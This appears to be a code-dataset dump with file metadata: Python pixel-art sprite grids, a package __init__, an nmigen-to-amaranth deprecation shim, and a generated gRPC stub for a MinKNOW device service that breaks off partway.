[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
}
mouse = {
'colors': [0, '000000', 'fe6f06', 'fbb988', 'd2d8db', 'ffffff', 'ecd993', '8af9ff', 'ff94f8', '998fff'],
'data': [
[9, 9, 9, 1, 1, 1, 1, 1, 1, 9, 9, 9, 9, 9, 9, 1, 1, 1, 1, 1, 1, 9, 9, 9],
[9, 9, 1, 2, 2, 2, 2, 2, 2, 1, 9, 9, 9, 9, 9, 1, 3, 3, 3, 3, 3, 1, 9, 9],
[9, 1, 2, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 3, 3, 3, 1, 1, 3, 1, 9],
[9, 1, 8, 8, 8, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 1, 8, 8, 8, 1, 9],
[9, 1, 8, 8, 8, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 1, 8, 8, 8, 1, 9],
[9, 1, 8, 8, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 5, 1, 8, 8, 1, 9],
[9, 9, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 5, 5, 5, 1, 1, 9, 9],
[9, 9, 9, 1, 2, 2, 1, 1, 1, 2, 2, 2, 4, 3, 3, 1, 1, 1, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 1, 2, 1, 1, 7, 7, 1, 4, 4, 3, 3, 1, 7, 7, 1, 1, 5, 1, 9, 9, 9],
[9, 9, 1, 2, 2, 1, 1, 7, 7, 1, 4, 4, 3, 3, 1, 7, 7, 1, 1, 5, 5, 1, 9, 9],
[9, 9, 1, 4, 4, 1, 7, 1, 1, 1, 4, 4, 5, 5, 1, 1, 1, 7, 1, 5, 5, 1, 9, 9],
[9, 9, 1, 1, 4, 4, 1, 1, 1, 4, 4, 5, 5, 5, 5, 1, 1, 1, 5, 5, 5, 1, 9, 9],
[9, 9, 1, 4, 4, 4, 4, 4, 4, 4, 4, 5, 1, 5, 5, 5, 5, 5, 5, 5, 5, 1, 9, 9],
[9, 9, 1, 1, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 9, 9],
[9, 9, 1, 4, 4, 4, 4, 4, 4, 1, 5, 5, 1, 5, 5, 1, 5, 5, 5, 5, 5, 1, 9, 9],
[9, 9, 9, 1, 4, 4, 4, 4, 5, 5, 1, 1, 5, 1, 1, 5, 5, 5, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 1, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 1, 1, 2, 3, 5, 1, 5, 5, 5, 5, 5, 5, 1, 5, 3, 2, 1, 1, 9, 9, 9],
[9, 9, 9, 1, 2, 3, 5, 6, 6, 1, 5, 5, 5, 5, 1, 6, 6, 5, 3, 2, 1, 9, 9, 9],
[9, 9, 9, 1, 5, 5, 1, 6, 6, 1, 5, 5, 5, 5, 1, 6, 6, 1, 5, 5, 1, 9, 9, 9],
[9, 9, 9, 9, 1, 5, 5, 1, 1, 5, 5, 5, 5, 5, 5, 1, 1, 5, 5, 1, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 1, 5, 5, 5, 1, 1, 1, 1, 1, 1, 5, 5, 5, 1, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 1, 6, 6, 1, 1, 9, 9, 9, 9, 9, 9, 1, 1, 6, 6, 1, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 1, 1, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 1, 1, 9, 9, 9, 9, 9]
]
}
cattle = {
'colors': [0, '000000', 'faf9d4', 'ffffff', 'fe6f06', 'fbb988', 'd2d8db', 'ecd993', '8af9ff', 'ff94f8'],
'data': [
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 4, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 2, 4, 9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 4, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 2, 4, 9, 3, 3, 3, 3, 3, 9, 4, 2, 2, 4, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 3, 3, 4, 3, 3, 3, 5, 3, 3, 3, 3, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 3, 3, 4, 3, 3, 3, 5, 5, 3, 3, 4, 3, 3, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 4, 3, 3, 3, 5, 5, 4, 3, 3, 4, 9, 3, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 3, 3, 3, 5, 5, 5, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 3, 3, 4, 1, 5, 5, 5, 1, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 4, 4, 5, 5, 5, 4, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 4, 5, 5, 5, 5, 5, 4, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 5, 5, 1, 5, 1, 5, 5, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 4, 4, 5, 5, 5, 5, 5, 5, 5, 4, 4, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 4, 4, 5, 5, 5, 5, 5, 4, 4, 9, 8, 8, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 4, 9, 9, 9, 8, 8, 8, 8, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 4, 4, 4, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 4, 4, 6, 4, 6, 4, 4, 8, 8, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 7, 4, 7, 4, 7, 4, 7, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9],
[9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9]
]
}
man = {
'colors': [0, '000000', 'e0c29e', '585858', 'fdfdfd'],
'data': [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 3, 3, 2, 2, 2, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 4, 2, 2, 2, 1, 4, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 1, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 1, 1, 1, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
}
woman = {
'colors': [0, '000000', 'e0c29e', '585858', 'fdfdfd'],
'data': [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 3, 3, 2, 2, 2, 3, 3, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 1, 4, 2, 2, 2, 1, 4, 2, 2, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 1, 1, 1, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
}
cattle_DC = {
'colors': [0,"000000","81ffb7","ffffff","f0ff96","030500",'ecd993', '8af9ff',"fffeff","fafcfb"],
'data': [
[7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 1, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 4, 4, 1, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 1, 1, 1, 4, 4, 4, 4, 1, 1, 1, 7, 7, 7, 7, 7, 7, 7, 7],
[7, 1, 1, 7, 7, 1, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 1, 7, 7, 7, 7, 7, 7, 7],
[7, 1, 2, 1, 1, 2, 3, 3, 3, 3, 3, 4, 1, 1, 5, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 1, 2, 2, 1, 2, 2, 3, 1, 1, 1, 1, 7, 7, 1, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 7, 1, 2, 1, 2, 2, 1, 8, 8, 8, 8, 8, 8, 1, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 7, 1, 1, 2, 2, 1, 8, 8, 8, 8, 8, 8, 1, 5, 5, 5, 1, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 1, 2, 2, 1, 8, 1, 1, 8, 8, 1, 5, 5, 5, 1, 7, 7, 7, 7, 7, 7, 7],
[7, 7, 7, 1, 2, 1, 8, 8, 1, 1, 8, 8, 8, 1, 1, 1, 6, 1, 7, 7, 1, 7, 7, 7],
[7, 7, 7, 7, 1, 8, 8, 8, 1, 1, 8, 8, 8, 1, 6, 6, 6, 1, 1, 1, 5, 1, 7, 7],
[7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 1, 6, 6, 6, 1, 1, 3, 3, 2, 1, 7, 7],
[7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 1, 1, 1, 4, 4, 4, 3, 3, 1, 7, 7],
[7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 1, 1, 8, 8, 8, 4, 4, 3, 1, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 1, 1, 1, 1, 1, 1, 8, 8, 1, 1, 1, 1, 4, 1, 7, 7, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 1, 8, 1, 1, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 3, 3, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 2, 2, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 1, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 5, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 1, 8, 1, 8, 8, 1, 1, 1, 1, 1, 1, 8, 8, 1, 6, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 1, 2, 1, 5, 5, 1, 7, 7, 7, 1, 5, 1, 2, 2, 1, 1, 7],
[7, 7, 7, 7, 7, 7, 7, 1, 3, 1, 4, 4, 1, 7, 7, 7, 1, 4, 1, 3, 3, 1, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 1, 1, 1, 1, 7, 7, 7, 7, 1, 1, 1, 1, 1, 1, 7, 7],
[7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7]
]
} | 69.483333 | 108 | 0.302551 | 3,487 | 12,507 | 1.084887 | 0.015199 | 0.676712 | 0.98414 | 1.270949 | 0.908538 | 0.894792 | 0.881311 | 0.860428 | 0.84166 | 0.824742 | 0 | 0.45346 | 0.377229 | 12,507 | 180 | 109 | 69.483333 | 0.032225 | 0.016471 | 0 | 0.389535 | 0 | 0 | 0.021962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
41fc21a4532d435a2003135ff3d24c42f0b00d6e | 184 | py | Python | alpha_shape_analysis/__init__.py | StillEvan/alpha_shape_analysis | 196ee30d02871374a41b6091b314872cacacef8d | [
"MIT"
] | 1 | 2022-01-16T21:02:57.000Z | 2022-01-16T21:02:57.000Z | alpha_shape_analysis/__init__.py | StillEvan/alpha_shape_analysis | 196ee30d02871374a41b6091b314872cacacef8d | [
"MIT"
] | null | null | null | alpha_shape_analysis/__init__.py | StillEvan/alpha_shape_analysis | 196ee30d02871374a41b6091b314872cacacef8d | [
"MIT"
] | 1 | 2020-12-17T07:03:19.000Z | 2020-12-17T07:03:19.000Z | # __init__.py
from .simplex_property_determination import *
from .rejection_sampling import *
from .alpha_hull import *
from .alpha_heuristics import *
from .alpha_shape_main import * | 26.285714 | 45 | 0.815217 | 24 | 184 | 5.791667 | 0.583333 | 0.28777 | 0.323741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119565 | 184 | 7 | 46 | 26.285714 | 0.858025 | 0.059783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
51188ad85db0f606ebb46fd1799c0c65b154bbe1 | 251 | py | Python | nmigen/compat/genlib/coding.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 528 | 2020-01-28T18:21:00.000Z | 2021-12-09T06:27:51.000Z | nmigen/compat/genlib/coding.py | DX-MON/nmigen | a6a13dd612ee1c9215719c70a5aa410a8775ffdb | [
"BSD-2-Clause"
] | 360 | 2020-01-28T18:34:30.000Z | 2021-12-10T08:03:32.000Z | nmigen/compat/genlib/coding.py | DX-MON/nmigen | a6a13dd612ee1c9215719c70a5aa410a8775ffdb | [
"BSD-2-Clause"
] | 100 | 2020-02-06T21:55:46.000Z | 2021-11-25T19:20:44.000Z | from amaranth.compat.genlib.coding import *
from amaranth.compat.genlib.coding import __all__
import warnings
warnings.warn("instead of nmigen.compat.genlib.coding, use amaranth.compat.genlib.coding",
DeprecationWarning, stacklevel=2)
| 31.375 | 90 | 0.780876 | 31 | 251 | 6.193548 | 0.516129 | 0.25 | 0.375 | 0.40625 | 0.375 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.131474 | 251 | 7 | 91 | 35.857143 | 0.876147 | 0 | 0 | 0 | 0 | 0 | 0.290837 | 0.227092 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
51477b87a4caa7493006e24ad4175d8de513b8ec | 7,401 | py | Python | porerefiner/protocols/minknow/rpc/device_grpc.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 8 | 2019-10-10T20:05:18.000Z | 2021-02-19T21:53:43.000Z | porerefiner/protocols/minknow/rpc/device_grpc.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 2 | 2020-07-17T07:24:17.000Z | 2021-02-19T22:28:12.000Z | porerefiner/protocols/minknow/rpc/device_grpc.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 2 | 2019-10-01T15:45:59.000Z | 2019-10-28T19:15:32.000Z | # Generated by the Protocol Buffers compiler. DO NOT EDIT!
# source: minknow/rpc/device.proto
# plugin: grpclib.plugin.main
import abc
import typing
import grpclib.const
import grpclib.client
if typing.TYPE_CHECKING:
import grpclib.server
from . import rpc_options_pb2
import google.protobuf.wrappers_pb2
from . import device_pb2
class DeviceServiceBase(abc.ABC):
@abc.abstractmethod
async def get_device_info(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetDeviceInfoRequest, minknow.rpc.device_pb2.GetDeviceInfoResponse]') -> None:
pass
@abc.abstractmethod
async def get_device_state(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetDeviceStateRequest, minknow.rpc.device_pb2.GetDeviceStateResponse]') -> None:
pass
@abc.abstractmethod
async def stream_device_state(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.StreamDeviceStateRequest, minknow.rpc.device_pb2.GetDeviceStateResponse]') -> None:
pass
@abc.abstractmethod
async def get_flow_cell_info(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetFlowCellInfoRequest, minknow.rpc.device_pb2.GetFlowCellInfoResponse]') -> None:
pass
@abc.abstractmethod
async def stream_flow_cell_info(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.StreamFlowCellInfoRequest, minknow.rpc.device_pb2.GetFlowCellInfoResponse]') -> None:
pass
@abc.abstractmethod
async def set_user_specified_flow_cell_id(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdRequest, minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdResponse]') -> None:
pass
@abc.abstractmethod
async def set_user_specified_product_code(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.SetUserSpecifiedProductCodeRequest, minknow.rpc.device_pb2.SetUserSpecifiedProductCodeResponse]') -> None:
pass
@abc.abstractmethod
async def get_channels_layout(self, stream: 'grpclib.server.Stream[minknow.rpc.device_pb2.GetChannelsLayoutRequest, minknow.rpc.device_pb2.GetChannelsLayoutResponse]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/ont.rpc.device.DeviceService/get_device_info': grpclib.const.Handler(
self.get_device_info,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetDeviceInfoRequest,
minknow.rpc.device_pb2.GetDeviceInfoResponse,
),
'/ont.rpc.device.DeviceService/get_device_state': grpclib.const.Handler(
self.get_device_state,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetDeviceStateRequest,
minknow.rpc.device_pb2.GetDeviceStateResponse,
),
'/ont.rpc.device.DeviceService/stream_device_state': grpclib.const.Handler(
self.stream_device_state,
grpclib.const.Cardinality.UNARY_STREAM,
minknow.rpc.device_pb2.StreamDeviceStateRequest,
minknow.rpc.device_pb2.GetDeviceStateResponse,
),
'/ont.rpc.device.DeviceService/get_flow_cell_info': grpclib.const.Handler(
self.get_flow_cell_info,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetFlowCellInfoRequest,
minknow.rpc.device_pb2.GetFlowCellInfoResponse,
),
'/ont.rpc.device.DeviceService/stream_flow_cell_info': grpclib.const.Handler(
self.stream_flow_cell_info,
grpclib.const.Cardinality.UNARY_STREAM,
minknow.rpc.device_pb2.StreamFlowCellInfoRequest,
minknow.rpc.device_pb2.GetFlowCellInfoResponse,
),
'/ont.rpc.device.DeviceService/set_user_specified_flow_cell_id': grpclib.const.Handler(
self.set_user_specified_flow_cell_id,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdRequest,
minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdResponse,
),
'/ont.rpc.device.DeviceService/set_user_specified_product_code': grpclib.const.Handler(
self.set_user_specified_product_code,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.SetUserSpecifiedProductCodeRequest,
minknow.rpc.device_pb2.SetUserSpecifiedProductCodeResponse,
),
'/ont.rpc.device.DeviceService/get_channels_layout': grpclib.const.Handler(
self.get_channels_layout,
grpclib.const.Cardinality.UNARY_UNARY,
minknow.rpc.device_pb2.GetChannelsLayoutRequest,
minknow.rpc.device_pb2.GetChannelsLayoutResponse,
),
}
class DeviceServiceStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.get_device_info = grpclib.client.UnaryUnaryMethod(
channel,
'/ont.rpc.device.DeviceService/get_device_info',
minknow.rpc.device_pb2.GetDeviceInfoRequest,
minknow.rpc.device_pb2.GetDeviceInfoResponse,
)
self.get_device_state = grpclib.client.UnaryUnaryMethod(
channel,
'/ont.rpc.device.DeviceService/get_device_state',
minknow.rpc.device_pb2.GetDeviceStateRequest,
minknow.rpc.device_pb2.GetDeviceStateResponse,
)
self.stream_device_state = grpclib.client.UnaryStreamMethod(
channel,
'/ont.rpc.device.DeviceService/stream_device_state',
minknow.rpc.device_pb2.StreamDeviceStateRequest,
minknow.rpc.device_pb2.GetDeviceStateResponse,
)
self.get_flow_cell_info = grpclib.client.UnaryUnaryMethod(
channel,
'/ont.rpc.device.DeviceService/get_flow_cell_info',
minknow.rpc.device_pb2.GetFlowCellInfoRequest,
minknow.rpc.device_pb2.GetFlowCellInfoResponse,
)
self.stream_flow_cell_info = grpclib.client.UnaryStreamMethod(
channel,
'/ont.rpc.device.DeviceService/stream_flow_cell_info',
minknow.rpc.device_pb2.StreamFlowCellInfoRequest,
minknow.rpc.device_pb2.GetFlowCellInfoResponse,
)
self.set_user_specified_flow_cell_id = grpclib.client.UnaryUnaryMethod(
channel,
'/ont.rpc.device.DeviceService/set_user_specified_flow_cell_id',
minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdRequest,
minknow.rpc.device_pb2.SetUserSpecifiedFlowCellIdResponse,
)
self.set_user_specified_product_code = grpclib.client.UnaryUnaryMethod(
channel,
'/ont.rpc.device.DeviceService/set_user_specified_product_code',
